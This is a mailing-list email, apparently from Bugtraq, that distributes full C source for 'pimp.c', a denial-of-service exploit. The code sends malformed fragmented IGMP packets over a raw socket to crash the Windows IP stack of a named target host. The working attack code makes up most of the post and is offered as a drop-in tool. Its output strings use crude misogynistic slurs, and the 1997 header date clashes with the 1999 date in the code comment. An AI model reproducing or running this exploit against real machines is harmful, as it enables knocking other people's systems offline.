MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Message-ID: <004901bc06b2$8ab081e0$8e42423f@klepto> Date: Mon, 20 Jan 1997 03:15:37 -0600 Reply-To: klepto Sender: Bugtraq List From: klepto Subject: ip stack bug exploit in windows X-To: bugtraq@securityfocus.net To: BUGTRAQ@SECURITYFOCUS.COM I wrote the initial exploit 2-3 months ago, only showing it to friends and associates. Those who were very close to me rewrote it over and over again to make it better; the version that defile wrote, kod 1.0, had problems with Linux because the kernel would ignore the send because of the length of the packet. A friend of mine named nyt helped me out a lot with the who and why of kod.c, and wrote a version of his own (original code). For those who are having problems getting kod.c to work for you, try this; I am positive it will work for you. 
you can find me on irc via EFnet as klepto or klepto@levitate.net de omnibus dubitandum shout outs: cheesebal/traveler/antibyte/winx *lub* /* ** pimp.c 6/4/99 by Rob Mosher: nyt@deadpig.org ** exploits bug in m$'s ip stack ** rewrite by nyt@EFnet ** bug found by klepto ** usage: pimp */ #include #include #include #include #include #include #include #include #include struct igmp { unsigned char igmp_type; unsigned char igmp_code; unsigned short igmp_cksum; struct in_addr igmp_group; }; #define ERROR(a) {printf("ERROR: %s\n", a);exit(-1);} u_long resolve(char *); int main(int argc, char *argv[]) { int nsock, ctr; char *pkt, *data; struct ip *nip; struct igmp *nigmp; struct sockaddr_in s_addr_in; setvbuf(stdout, NULL, _IONBF, 0); printf("pimp.c by nyt\n"); if(argc != 2) ERROR("usage: pimp "); if((nsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) ERROR("could not create raw socket"); pkt = malloc(1500); if(!pkt) ERROR("could not allocate memory"); memset(&s_addr_in, 0, sizeof(s_addr_in)); memset(pkt, 0, 1500); nip = (struct ip *) pkt; nigmp = (struct igmp *) (pkt + sizeof(struct ip)); data = (char *)(pkt + sizeof(struct ip) + sizeof(struct igmp)); memset(data, 'A', 1500-(sizeof(struct ip) + sizeof(struct igmp))); s_addr_in.sin_addr.s_addr = resolve(argv[1]); nip->ip_v = 4; nip->ip_hl = 5; nip->ip_tos = 0; nip->ip_id = 69; nip->ip_ttl = 255; nip->ip_p = IPPROTO_IGMP; nip->ip_sum = 0; nip->ip_dst.s_addr = s_addr_in.sin_addr.s_addr; nip->ip_src.s_addr = 2147100000; nigmp->igmp_type = 2; nigmp->igmp_code = 31; nigmp->igmp_cksum = 0; inet_aton("128.1.1.1", &nigmp->igmp_group); printf("pimpin' dem trick-ass-bitches"); for(ctr = 0;ctr < 15;ctr++) { printf("."); nip->ip_len = 1500; nip->ip_off = htons(IP_MF); sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); nip->ip_off = htons(1480/8)|htons(IP_MF); sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); nip->ip_off = htons(5920/8)|htons(IP_MF); sendto(nsock, pkt, 
1500, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); nip->ip_len = 831; nip->ip_off = htons(7400/8); sendto(nsock, pkt, 831, 0, (struct sockaddr *) &s_addr_in, sizeof(s_addr_in)); usleep(500000); } printf("*slap* *slap* bitch, who yo daddy\n"); shutdown(nsock, 2); close(nsock); } u_long resolve(char *host) { struct hostent *he; u_long ret; if(!(he = gethostbyname(host))) { herror("gethostbyname()"); exit(-1); } memcpy(&ret, he->h_addr, sizeof(he->h_addr)); return ret; }